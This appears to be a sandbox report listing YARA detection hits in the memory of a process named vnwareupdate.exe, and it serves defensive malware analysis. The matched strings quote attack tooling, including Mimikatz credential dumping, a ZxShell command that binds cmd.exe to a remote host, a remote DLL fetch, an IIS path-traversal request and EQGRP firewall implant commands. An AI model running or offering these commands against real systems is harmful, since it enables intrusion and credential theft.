Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_BBALL	EQGRP Toolset Firewall - file BBALL_E28F6-2201.exe	Florian Roth	0xdf219f:$s1: Components/Modules/BiosModule/Implant/E28F6/../e28f640j3_asm.S 0xdec158:$s2: .got_loader 0xdee4ad:$s2: .got_loader 0xdeea27:$s2: .got_loader 0xdefd0d:$s2: .got_loader 0xdf0385:$s2: .got_loader 0xdf06ab:$s2: .got_loader 0xdf14df:$s2: .got_loader 0xdf21fb:$s2: .got_loader 0xdeeac6:$s3: handler_readBIOS 0xdf2224:$s3: handler_readBIOS 0xdf2252:$s4: cmosReadByte 0xdec1cf:$s5: KEEPGOING 0xdecb0c:$s5: KEEPGOING 0xdeeaf4:$s5: KEEPGOING 0xdf06fc:$s5: KEEPGOING 0xdf155a:$s5: KEEPGOING 0xdf227c:$s5: KEEPGOING 0xdf22a3:$s6: checksumAreaConfirmed.0 0xdf22d8:$s7: writeSpeedPlow.c
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_BARPUNCH_BPICKER	EQGRP Toolset Firewall - from files BARPUNCH-3110, BPICKER-3100	Florian Roth	0xdf2533:$x1: --cmd %x --idkey %s --sport %i --dport %i --lp %s --implant %s --bsize %hu --logdir %s --lptimeout %u 0xdf25b6:$x2: %s -c <cmdtype> -l <lp> -i <implant> -k <ikey> -s <port> -d <port> [operation] [options] 0xdf262c:$x3: * [%lu] 0x%x is marked as stateless (the module will be persisted without its configuration) 0xdf26a6:$x4: %s version %s already has persistence installed. If you want to uninstall, 0xdf270e:$x5: The active module(s) on the target are not meant to be persisted
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_Implants_Gen5	EQGRP Toolset Firewall	Florian Roth	0xdf2e43:$x1: Module and Implant versions do not match. This module is not compatible with the target implant 0xdf2ec1:$s1: %s/BF_READ_%08x_%04d%02d%02d_%02d%02d%02d.log 0xdf2f0c:$s2: %s/BF_%04d%02d%02d.log 0xdf2f40:$s3: %s/BF_READ_%08x_%04d%02d%02d_%02d%02d%02d.bin
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_pandarock	EQGRP Toolset Firewall - from files pandarock_v1.11.1.1.bin, pit	Florian Roth	0xdf3231:$x3: execute code in <file> passing <argX> (HEX) 0xdf327a:$x4: * Use arrow keys to scroll through command history 0xdf32ca:$s1: pitCmd_processCmdLine 0xdf32fd:$s2: execute all commands in <file> 0xdf3339:$s3: __processShellCmd 0xdf3368:$s4: pitTarget_getDstPort 0xdf339a:$s5: __processSetTargetIp 0xdf33cc:$o1: Logging commands and output - ON 0xdf340a:$o2: This command is too dangerous. If you'd like to run it, contact the development team
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_BananaUsurper_writeJetPlow	EQGRP Toolset Firewall - from files BananaUsurper-2120, writeJetPlow-2130	Florian Roth	0xdf36c1:$x1: Implant Version-Specific Values: 0xdf36ff:$x2: This function should not be used with a Netscreen, something has gone horribly wrong 0xdf3771:$s1: createSendRecv: recv'd an error from the target. 0xdf37bf:$s2: Error: WatchDogTimeout read returned %d instead of 4
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_Implants_Gen4	EQGRP Toolset Firewall - from files BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120	Florian Roth	0xdf3a47:$s1: Command has not yet been coded 0xdf3a83:$s2: Beacon Domain : www.%s.com 0xdf3abc:$s3: This command can only be run on a PIX/ASA 0xdf3b03:$s4: Warning! Bad or missing Flash values (in section 2 of .dat file) 0xdf3b61:$s5: Printing the interface info and security levels. PIX ONLY.
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_Implants_Gen3	EQGRP Toolset Firewall	Florian Roth	0xdf3e0b:$x1: incomplete and must be removed manually.) 0xdf3e52:$s1: %s: recv'd an error from the target. 0xdf3e94:$s2: Unable to fetch the address to the get_uptime_secs function for this OS version 0xdf3f01:$s3: upload/activate/de-activate/remove/cmd function failed
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_BLIAR_BLIQUER	EQGRP Toolset Firewall - from files BLIAR-2110, BLIQUER-2230	Florian Roth	0xdf416e:$x1: Do you wish to activate the implant that is already on the firewall? (y/n): 0xdf41d8:$x2: There is no implant present on the firewall. 0xdf4222:$x3: Implant Version :%lx%lx%lx 0xdf425a:$x4: You may now connect to the implant using the pbd idkey 0xdf42ae:$x5: No reply from persistant back door. 0xdf42ef:$x6: rm -rf pbd.wc; wc -c %s > pbd.wc 0xdf432d:$p1: PBD_GetVersion 0xdf4359:$p2: pbd/pbdEncrypt.bin 0xdf4389:$p3: pbd/pbdGetVersion.pkt 0xdf43bc:$p4: pbd/pbdStartWrite.bin 0xdf43ef:$p5: pbd/pbd_setNewHookPt.pkt 0xdf4425:$p6: pbd/pbd_Upload_SinglePkt.pkt 0xdf445f:$s1: Unable to fetch hook and jmp addresses for this OS version 0xdf44b7:$s2: Could not get hook and jump addresses 0xdf44fa:$s3: Enter the name of a clean implant binary (NOT an image): 0xdf4550:$s4: Unable to read dat file for OS version 0x%08lx 0xdf459c:$s5: Invalid implant file
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_sploit	EQGRP Toolset Firewall - from files sploit.py, sploit.py	Florian Roth	0xdf495b:$s4: exp.load_vinfo() 0xdf4989:$s5: if not okay and self.terminateFlingOnException: 0xdf4a2d:$s7: if self.terminateFlingOnException: 0xdf4a6d:$s8: print 'Debug info ','='*40
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_Implants_Gen2	EQGRP Toolset Firewall	Florian Roth	0xdf4d0d:$x1: Modules persistence file written successfully 0xdf4d58:$x2: Modules persistence data successfully removed 0xdf4da3:$x3: No Modules are active on the firewall, nothing to persist 0xdf2533:$s1: --cmd %x --idkey %s --sport %i --dport %i --lp %s --implant %s --bsize %hu --logdir %s 0xdf4dfa:$s1: --cmd %x --idkey %s --sport %i --dport %i --lp %s --implant %s --bsize %hu --logdir %s 0xdf4e6f:$s2: Error while attemping to persist modules: 0xdf4eb6:$s3: Error while reading interface info from PIX 0xdf4eff:$s4: LP.c:pixFree - Failed to get response 0xdf4f42:$s5: WARNING: LP Timeout specified (%lu seconds) less than default (%u seconds). Setting default 0xdf4fbc:$s6: Unable to fetch config address for this OS version 0xdf500c:$s7: LP.c: interface information not available for this session 0xdf5064:$s8: [%s:%s:%d] ERROR: 0xdf5094:$s9: extract_fgbg
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_Implants_Gen1	EQGRP Toolset Firewall	Florian Roth	0xdf533f:$s1: WARNING: Session may not have been closed! 0xdf5388:$s2: EXEC Packet Processed 0xdf53bb:$s3: Failed to insert the command into command list. 0xdf5408:$s4: Send_Packet: Trying to send too much data. 0xdf5450:$s5: payloadLength >= MAX_ALLOW_SIZE. 0xdf548e:$s6: Wrong Payload Size 0xdf54be:$s7: Unknown packet received...... 0xdf54f9:$s8: Returned eax = %08x
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_ssh_telnet_29	EQGRP Toolset Firewall - from files ssh.py, telnet.py	Florian Roth	0xdf5a44:$s1: received prompt, we're in 0xdf5a7b:$s2: failed to login, bad creds, abort 0xdf5b27:$s4: received nat - EPBA: ok, payload: mangled, did not run 0xdf5b7b:$s5: no status returned from target, could be an exploit failure, or this is a version where we don't expect a stus return 0xdf5c05:$s6: received arp - EPBA: ok, payload: fail
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_callbacks	EQGRP Toolset Firewall - Callback addresses	Florian Roth	0xded4ab:$s1: 30.40.50.60:9342
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_Extrabacon_Output	EQGRP Toolset Firewall - Extrabacon exploit output	Florian Roth	0xdf5e7b:$s1: \|###[ SNMPresponse ]### 0xdf5eb0:$s2: [+] generating exploit for exec mode pass-disable 0xdf5eff:$s3: [+] building payload for mode pass-disable 0xdf5f47:$s4: [+] Executing: extrabacon 0xdf5f7f:$s5: appended AAAADMINAUTH_ENABLE payload
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_Unique_Strings	EQGRP Toolset Firewall - Unique strings	Florian Roth	0xded690:$s1: /BananaGlee/ELIGIBLEBOMB 0xded6bd:$s2: Protocol must be either http or https (Ex: https://1.2.3.4:1234)
Process Memory Space: vnwareupdate.exe PID: 2540	kerberoast_PY	Auto-generated rule - file kerberoast.py	Florian Roth	0xe023d2:$s1: newencserverticket = kerberos.encrypt(key, 2, encoder.encode(decserverticket), nonce) 0xe02445:$s2: key = kerberos.ntlmhash(args.password) 0xe02489:$s3: help='the password used to decrypt/encrypt the ticket') 0xe024de:$s4: newencserverticket = kerberos.encrypt(key, 2, e, nonce)
Process Memory Space: vnwareupdate.exe PID: 2540	p0wnedPowerCat	p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedPowerCat.cs	Florian Roth	0xdcbe59:$x1: Now if we point Firefox to http://127.0.0.1 0xdcbea2:$x2: powercat -l -v -p 0xdcbed1:$x3: P0wnedListener 0xdcc5c3:$x3: P0wnedListener 0xdcbefd:$x4: EncodedPayload.bat 0xdcbf2d:$x5: powercat -c 0xdcbf57:$x6: Program.P0wnedPath() 0xdcd791:$x6: Program.P0wnedPath() 0xdcbf80:$x7: Invoke-PowerShellTcpOneLine
Process Memory Space: vnwareupdate.exe PID: 2540	Hacktool_Strings_p0wnedShell	p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs	Florian Roth	0xdcc202:$x1: Invoke-TokenManipulation 0xdccb9a:$x1: Invoke-TokenManipulation 0xdcc238:$x2: windows/meterpreter 0xdccc8a:$x2: windows/meterpreter 0xe1db23:$x2: windows/meterpreter 0xdcc269:$x3: lsadump::dcsync 0xdcc296:$x4: p0wnedShellx86 0xdcc2c2:$x5: p0wnedShellx64 0xdcc92c:$x5: p0wnedShellx64 0xdcc9a5:$x5: p0wnedShellx64 0xdcc2ee:$x6: Invoke_PsExec() 0xdcc31b:$x7: Invoke-Mimikatz 0xde6c90:$x7: Invoke-Mimikatz 0xde6f37:$x7: Invoke-Mimikatz 0xde7aa7:$x7: Invoke-Mimikatz 0xe09517:$x7: Invoke-Mimikatz 0xe1dd7d:$x7: Invoke-Mimikatz 0xe1e9ec:$x7: Invoke-Mimikatz 0xdcc348:$x8: Invoke_Shellcode() 0xdcc378:$x9: Invoke-ReflectivePEInjection 0xddc616:$x9: Invoke-ReflectivePEInjection
Process Memory Space: vnwareupdate.exe PID: 2540	p0wnedPotato	p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedPotato.cs	Florian Roth	0xdcc599:$x1: Invoke-Tater 0xdcc5c3:$x2: P0wnedListener.Execute(WPAD_Proxy); 0xdcc604:$x3: -SpooferIP 0xdcc625:$x4: TaterCommand()
Process Memory Space: vnwareupdate.exe PID: 2540	p0wnedExploits	p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedExploits.cs	Florian Roth	0xdcc87e:$x1: Pshell.RunPSCommand(Whoami); 0xdcc8b8:$x2: If succeeded this exploit should popup a System CMD Shell
Process Memory Space: vnwareupdate.exe PID: 2540	p0wnedBinaries	p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedBinaries.cs	Florian Roth	0xdccb06:$x1: Oq02AB+LCAAAAAAABADs/QkW3LiOLQBuRUsQR1H731gHMQOkFGFnvvrdp/O4sp6tkDiAIIjhAryu4z6PVOtxHuXz3/xT6X9za/Df/Hsa/JT/9 0xdcd268:$x1: Oq02AB+LCAAAAAAABADs/QkW3LiOLQBuRUsQR1H731gHMQOkFGFnvvrdp/O4sp6tkDiAIIjhAryu4z6PVOtxHuXz3/xT6X9za/Df/Hsa/JT/9 0xdcd2ea:$x2: wpoWAB+LCAAAAAAABADs/QeyK7uOBYhORUNIenL+E2vBA0ympH3erY4f8Tte3TpbUiY9YRbcGK91vVKtr+tV3v/B/yr/m1vD/+DvNOVb+V/f 0xdcd36b:$x3: mo0MAB+LCAAAAAAABADsXQl24zqu3YqXII6i9r+xJ4AACU4SZcuJnVenf/9OxbHEAcRwcQGu62NbHsrax/Iw+3/hP5b+VzuH/4WfVeDf8n98 0xdcd3ec:$x4: LE4CAB+LCAAAAAAABADsfQmW2zqu6Fa8BM7D/jf2hRmkKNuVm/Tt9zunkipb4giCIGb2/prhFUt5hVe+/sNP4b+pVvwPn+OQp/LT9ge/+ 0xdcd46a:$x5: XpMCAB+LCAAAAAAABADsfQeWIzmO6FV0hKAn73+xL3iAwVAqq2t35r/tl53VyhCDFoQ3Y7zW9Uq1vq5Xef/CT+X/59bwFz6nKU/lp+8P/ 0xdcd4e8:$x6: STwAAB+LCAAAAAAABADtWwmy6yoO3YqXgJjZ/8ZaRwNgx/HNfX/o7qqUkxgzCM0SmLR2jHBQzkc4En9xZbvHUuSLMnWv9ateK/70ilStR 0xdcd566:$x7: namespace p0wnedShell 0xdcd7c3:$x7: namespace p0wnedShell
Process Memory Space: vnwareupdate.exe PID: 2540	p0wnedAmsiBypass	p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedAmsiBypass.cs	Florian Roth	0xdcbf57:$x1: Program.P0wnedPath() 0xdcd791:$x1: Program.P0wnedPath() 0xdcd566:$x2: namespace p0wnedShell 0xdcd7c3:$x2: namespace p0wnedShell 0xdcd7f6:$x3: H4sIAAAAAAAEAO1YfXRUx3WflXalFazQgiVb5nMVryzxIbGrt/rcFRZIa1CQYEFCQnxotUhP2pX3Q337HpYotCKrPdbmoQQnkOY0+BQCNKRpe
Process Memory Space: vnwareupdate.exe PID: 2540	p0wnedShell_outputs	p0wnedShell Runspace Post Exploitation Toolkit - from files p0wnedShell.cs, p0wnedShell.cs	Florian Roth	0xdcda7c:$s1: [+] For this attack to succeed, you need to have Admin privileges. 0xdcdadc:$s2: [+] This is not a valid hostname, please try again 0xdcdb2c:$s3: [+] First return the name of our current domain.
Process Memory Space: vnwareupdate.exe PID: 2540	PlugX_J16_Gen2	Detects PlugX Malware Samples from June 2016	Florian Roth	0xdfe6ba:$s1: XPlugKeyLogger.cpp 0xdfe6ea:$s2: XPlugProcess.cpp 0xdfe718:$s4: XPlgLoader.cpp 0xdfe744:$s5: XPlugPortMap.cpp 0xdfe772:$s8: XPlugShell.cpp 0xdfe79f:$s11: file: %s, line: %d, error: [%d]%s 0xdfe7df:$s12: XInstall.cpp 0xdfe80a:$s13: XPlugTelnet.cpp 0xdfe838:$s14: XInstallUAC.cpp
Process Memory Space: vnwareupdate.exe PID: 2540	ps1_toolkit_Invoke_Shellcode	Auto-generated rule - file Invoke-Shellcode.ps1	Florian Roth	0xde6a22:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory 0xde6e0a:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory 0xe1ccca:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory 0xde6a6f:$s2: Get-ProcAddress kernel32.dll OpenProcess 0xde6b4e:$s4: inject shellcode into 0xde6b78:$s5: Injecting shellcode 0xe1db84:$s5: Injecting shellcode
Process Memory Space: vnwareupdate.exe PID: 2540	ps1_toolkit_Invoke_Mimikatz	Auto-generated rule - file Invoke-Mimikatz.ps1	Florian Roth	0xde6a22:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory 0xde6e0a:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory 0xe1ccca:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory 0xde6e57:$s2: ps \| where { $_.Name -eq $ProcName } \| select ProcessName, Id, SessionId 0xde6ebd:$s3: privilege::debug exit 0xde6ee7:$s4: Get-ProcAddress Advapi32.dll AdjustTokenPrivileges 0xde746b:$s4: Get-ProcAddress Advapi32.dll AdjustTokenPrivileges 0xde6f37:$s5: Invoke-Mimikatz -DumpCreds 0xde6f6f:$s6: \| Add-Member -MemberType NoteProperty -Name IMAGE_FILE_EXECUTABLE_IMAGE -Value 0x0002
Process Memory Space: vnwareupdate.exe PID: 2540	ps1_toolkit_Invoke_RelfectivePEInjection	Auto-generated rule - file Invoke-RelfectivePEInjection.ps1	Florian Roth	0xde7242:$x1: Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName (Get-Content targetlist.txt) 0xde72d1:$x2: Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName Target.local 0xde7350:$x3: } = Get-ProcAddress Advapi32.dll OpenThreadToken 0xde7395:$x4: Invoke-ReflectivePEInjection -PEBytes $PEBytes -ProcName lsass -ComputerName Target.Local 0xde740c:$s5: $PEBytes = [IO.File]::ReadAllBytes('DemoDLL_RemoteProcess.dll') 0xde7469:$s6: = Get-ProcAddress Advapi32.dll AdjustTokenPrivileges
Process Memory Space: vnwareupdate.exe PID: 2540	ps1_toolkit_Persistence	Auto-generated rule - file Persistence.ps1	Florian Roth	0xde7752:$s2: }=$PROFILE.AllUsersAllHosts;${ 0xde77e7:$s4: = gwmi Win32_OperatingSystem \| select -ExpandProperty OSArchitecture 0xde7840:$s5: -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MAAxADQAQwA=')))) 0xde78ac:$s6: }=$PROFILE.CurrentUserAllHosts;${ 0xde78e2:$s7: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=') 0xde89e5:$s7: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=') 0xde793f:$s8: [System.Text.AsciiEncoding]::ASCII.GetString($MZHeader)
Process Memory Space: vnwareupdate.exe PID: 2540	ps1_toolkit_Invoke_Mimikatz_RelfectivePEInjection	Auto-generated rule - from files Invoke-Mimikatz.ps1, Invoke-RelfectivePEInjection.ps1	Florian Roth	0xde7c4a:$s1: [IntPtr]$DllAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr]) 0xde7cd5:$s2: if ($GetCommandLineAAddr -eq [IntPtr]::Zero -or $GetCommandLineWAddr -eq [IntPtr]::Zero) 0xde7d4b:$s3: [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xbb) 0xde7dce:$s4: Function Import-DllInRemoteProcess 0xde7e0e:$s5: FromBase64String('QwBvAG4AdABpAG4AdQBlAA=='))) 0xde7e5a:$s6: [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x83, 0xec, 0x20, 0x83, 0xe4, 0xc0, 0xbb) 0xde7ecb:$s7: [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesMem) 0xde7f33:$s8: [System.Runtime.InteropServices.Marshal]::StructureToPtr($CurrAddr, $FinalAddr, $false) \| Out-Null 0xde7fb3:$s9: ::FromBase64String('RABvAG4AZQAhAA=='))) 0xde803c:$s11: [IntPtr]$ProcAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])
Process Memory Space: vnwareupdate.exe PID: 2540	ps1_toolkit_Inveigh_BruteForce_2	Auto-generated rule - from files Inveigh-BruteForce.ps1	Florian Roth	0xde831c:$s1: }.NTLMv2_file_queue[0]\|Out-File ${ 0xde8353:$s2: }.NTLMv2_file_queue.RemoveRange(0,1) 0xde838c:$s3: }.NTLMv2_file_queue.Count -gt 0) 0xde83c1:$s4: }.relay_running = $false
Process Memory Space: vnwareupdate.exe PID: 2540	ps1_toolkit_Persistence_2	Auto-generated rule - from files Persistence.ps1	Florian Roth	0xde78e2:$s1: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=') 0xde89e5:$s1: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=') 0xde8a42:$s2: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBEAGEAaQBsAHkA') 0xde8a9b:$s3: FromBase64String('UAB1AGIAbABpAGMALAAgAFMAdABhAHQAaQBjAA==') 0xde8aec:$s4: [Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )] 0xde8b4c:$s5: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAHQATABvAGcAbwBuAA=='))) 0xde8baf:$s6: [Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )] 0xde8c19:$s7: FromBase64String('TQBlAHQAaABvAGQA') 0xde8c52:$s8: FromBase64String('VAByAGkAZwBnAGUAcgA=') 0xde8c8f:$s9: [Runtime.InteropServices.CallingConvention]::Winapi,
Process Memory Space: vnwareupdate.exe PID: 2540	ps1_toolkit_Inveigh_BruteForce_3	Auto-generated rule - from files Inveigh-BruteForce.ps1	Florian Roth	0xde8f33:$s1: ::FromBase64String('TgBUAEwATQA=') 0xde8f6a:$s2: ::FromBase64String('KgBTAE0AQgAgAHIAZQBsAGEAeQAgACoA'))) 0xde8fb7:$s3: ::FromBase64String('KgAgAGYAbwByACAAcgBlAGwAYQB5ACAAKgA='))) 0xde9008:$s4: ::FromBase64String('KgAgAHcAcgBpAHQAdABlAG4AIAB0AG8AIAAqAA=='))) 0xde905d:$s5: [Byte[]] $HTTP_response = (0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20)` 0xde90c4:$s6: KgAgAGwAbwBjAGEAbAAgAGEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIAAqAA 0xde9117:$s7: }.bruteforce_running)
Process Memory Space: vnwareupdate.exe PID: 2540	Backdoor_Redosdru_Jun17	Detects malware Redosdru - file systemHome.exe	Florian Roth	0xd88896:$x3: baijinUPdate 0xd888ff:$s2: serviceone 0xd88953:$s4: servicetwo 0xd8897b:$s5: UpdateCrc 0xd889ce:$s7: nwsaPAgEnT 0xd889f6:$s8: %-24s %-15s 0x%x(%d)
Process Memory Space: vnwareupdate.exe PID: 2540	IronGate_APT_Step7ProSim_Gen	Detects IronGate APT Malware - Step7ProSim DLL	Florian Roth	0xdff15a:$s1: Step7ProSim.Interfaces 0xdff18e:$s2: payloadExecutionTimeInMilliSeconds 0xdff20a:$s4: <KillProcess>b__0 0xdff239:$s5: newDllFilename 0xdff295:$s7: $863d8af0-cee6-4676-96ad-13e8540f4d47 0xdff2d8:$s8: RunPlcSim 0xdff2ff:$s9: $ccc64bc5-ef95-4217-adc4-5bf0d448c272 0xdff343:$s10: InstallProxy 0xdff36e:$s11: DllProxyInstaller 0xdff39e:$s12: FindFileInDrive
Process Memory Space: vnwareupdate.exe PID: 2540	ZxShell_Jul17	Detects a ZxShell - CN threat group	Florian Roth	0xd7d350:$x1: zxplug -add 0xd7d3ea:$x4: -fromurl http://x.x.x/x.dll 0xd7d423:$x5: ping 127.0.0.1 -n 7&cmd.exe /c net start %s 0xd7d46c:$x6: ZXNC -e cmd.exe x.x.x.x 0xd7d4a1:$x7: (bind a cmdshell) 0xd7d4d0:$x8: ZXFtpServer 21 20 zx 0xd7d502:$x9: ZXHttpServer 0xd7d5b5:$x12: AntiSniff -a wireshark.exe
Process Memory Space: vnwareupdate.exe PID: 2540	DeepPanda_htran_exe	Hack Deep Panda - htran-exe	Florian Roth	0xe1a323:$s0: %s -<listen\|tran\|slave> <option> [-log logfile] 0xe42247:$s0: %s -<listen\|tran\|slave> <option> [-log logfile] 0xe1a410:$s3: [SERVER]connection to %s:%d error 0xe43d6e:$s3: [SERVER]connection to %s:%d error 0xe4fb22:$s3: [SERVER]connection to %s:%d error 0xe6981b:$s3: [SERVER]connection to %s:%d error 0xe6985a:$s4: -tran <ConnectPort> <TransmitHost> <TransmitPort> 0xe699a1:$s11: -slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort> 0xe1a5d1:$s15: [+] OK! I Closed The Two Socket. 0xe4fb61:$s15: [+] OK! I Closed The Two Socket. 0xe69a42:$s20: -listen <ConnectPort> <TransmitPort>
Process Memory Space: vnwareupdate.exe PID: 2540	EternalRocks_taskhost	Detects EternalRocks Malware - file taskhost.exe	Florian Roth	0xd8b3b8:$s1: sTargetIP 0xd8b3df:$s2: SERVER_2008R2_SP0 0xd8b40e:$s3: 20D5CCEE9C91A1E61F72F46FA117B93FB006DB51 0xd8b454:$s4: 9EBF75119B8FC7733F77B06378F9E735D34664F6
Process Memory Space: vnwareupdate.exe PID: 2540	Amplia_Security_Tool	Amplia Security Tool	unknown	0x5c60bb:$a: Amplia Security 0x5c6233:$a: Amplia Security 0xe40c8f:$a: Amplia Security 0x5c6251:$c: getlsasrvaddr.exe 0xe40c77:$c: getlsasrvaddr.exe 0x5c6271:$d: Cannot get PID of LSASS.EXE 0x5c629b:$e: extract the TGT session key 0x5c62c5:$f: PPWDUMP_DATA
Process Memory Space: vnwareupdate.exe PID: 2540	PwDump	PwDump 6 variant	Marc Stroebel	0xde5d22:$s5: Usage: %s [-x][-n][-h][-o output_file][-u user][-p password][-s share] machineNa 0xde5d92:$s7: pwdump6 Version %s by fizzgig and the mighty group at foofus.net
Process Memory Space: vnwareupdate.exe PID: 2540	scanarator	Auto-generated rule on file scanarator.exe	yarGen Yara Rule Generator by Florian Roth	0x5c5fef:$s4: GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Process Memory Space: vnwareupdate.exe PID: 2540	VSSown_VBS	Detects VSSown.vbs script - used to export shadow copy elements like NTDS to take away and crack elsewhere	Florian Roth	0xe17a96:$s0: Select * from Win32_Service Where Name ='VSS' 0xe17ad8:$s1: Select * From Win32_ShadowCopy 0xe17b0b:$s2: cmd /C mklink /D 0xe17b31:$s3: ClientAccessible 0xd15347:$s4: WScript.Shell 0xd308c6:$s4: WScript.Shell 0xd4c566:$s4: WScript.Shell 0xd588ee:$s4: WScript.Shell 0xd58960:$s4: WScript.Shell 0xd59896:$s4: WScript.Shell 0xd65917:$s4: WScript.Shell 0xd6dd51:$s4: WScript.Shell 0xd6ddab:$s4: WScript.Shell 0xd72233:$s4: WScript.Shell 0xd72289:$s4: WScript.Shell 0xd72465:$s4: WScript.Shell 0xd79ff6:$s4: WScript.Shell 0xd7b99c:$s4: WScript.Shell 0xd8505a:$s4: WScript.Shell 0xd8c46a:$s4: WScript.Shell 0xd8c721:$s4: WScript.Shell
Process Memory Space: vnwareupdate.exe PID: 2540	Linux_Portscan_Shark_2	Detects Linux Port Scanner Shark	Florian Roth	0xe058e7:$s1: usage: %s <fisier ipuri> <fisier useri:parole> <connect timeout> <fail2ban wait> <threads> <outfile> <port> 0xe05970:$s2: Difference between server modulus and host modulus is only %d. It's illegal and may not work 0xe055ee:$s3: rm -rf scan.log 0xe059ea:$s3: rm -rf scan.log
Process Memory Space: vnwareupdate.exe PID: 2540	WCE_in_memory	Detects Windows Credential Editor (WCE) in memory (and also on disk)	Florian Roth	0xdeacf5:$s1: wkKUSvflehHr::o:t:s:c:i:d:a:g: 0xdead31:$s2: wceaux.dll
Process Memory Space: vnwareupdate.exe PID: 2540	pstgdump	Detects a tool used by APT groups - file pstgdump.exe	Florian Roth	0xde4ab7:$x2: Failed to dump all protected storage items - see previous messages for details 0xde4b23:$x3: ptsgdump [-h][-q][-u Username][-p Password] 0xde4b6c:$x4: Attempting to impersonate domain user '%s' in domain '%s' 0xde4bc3:$x5: Failed to impersonate user (ImpersonateLoggedOnUser failed): error %d 0xde4c26:$x6: Unable to obtain handle to PStoreCreateInstance in pstorec.dll
Process Memory Space: vnwareupdate.exe PID: 2540	lsremora	Detects a tool used by APT groups	Florian Roth	0xde4e95:$x1: Target: Failed to load primary SAM functions. 0xde52f7:$x2: lsremora64.dll 0xde5e83:$x2: lsremora64.dll 0xde5eaf:$x5: lsremora.dll 0xde4ff9:$s3: Using pipe %s
Process Memory Space: vnwareupdate.exe PID: 2540	cachedump	Detects a tool used by APT groups - from files cachedump.exe, cachedump64.exe	Florian Roth	0xde599d:$s2: Unable to open LSASS.EXE process 0xde59db:$s3: Service not found. Installing CacheDump Service (%s) 0xde5a2d:$s4: CacheDump service successfully installed. 0xde5a74:$s5: Kill CacheDump service (shouldn't be used) 0xde5abc:$s6: cacheDump [-v \| -vv \| -K]
Process Memory Space: vnwareupdate.exe PID: 2540	PwDump_B	Detects a tool used by APT groups - file PwDump.exe	Florian Roth	0xde5d22:$x1: Usage: %s [-x][-n][-h][-o output_file][-u user][-p password][-s share] machineName 0xde5d92:$x2: pwdump6 Version %s by fizzgig and the mighty group at foofus.net 0xde5df0:$x3: where -x targets a 64-bit host 0xde5e2c:$x4: Couldn't delete target executable from remote machine: %d 0xde52f7:$s1: lsremora64.dll 0xde5e83:$s1: lsremora64.dll 0xde5eaf:$s2: lsremora.dll 0xde5ed9:$s3: servpw.exe
Process Memory Space: vnwareupdate.exe PID: 2540	MSBuild_Mimikatz_Execution_via_XML	Detects an XML that executes Mimikatz on an endpoint via MSBuild	Florian Roth	0xde1b61:$x1: <Project ToolsVersion= 0xde1b8c:$x2: </SharpLauncher> 0xd53b03:$s1: "TVqQAAMAAAA 0xd59658:$s1: "TVqQAAMAAAA 0xd65791:$s1: "TVqQAAMAAAA 0xd7a24e:$s1: "TVqQAAMAAAA 0xde1bbb:$s1: "TVqQAAMAAAA 0xdea9b2:$s1: "TVqQAAMAAAA 0xe1df14:$s1: "TVqQAAMAAAA 0xe1e6b6:$s1: "TVqQAAMAAAA 0xde1bdc:$s2: System.Convert.FromBase64String( 0x358da4:$s3: .Invoke( 0xd201d2:$s3: .Invoke( 0xd3fbe9:$s3: .Invoke( 0xd3fc49:$s3: .Invoke( 0xd3fd96:$s3: .Invoke( 0xdc680c:$s3: .Invoke( 0xdd8916:$s3: .Invoke( 0xdda12f:$s3: .Invoke( 0xde1c11:$s3: .Invoke( 0xe1dc24:$s3: .Invoke(
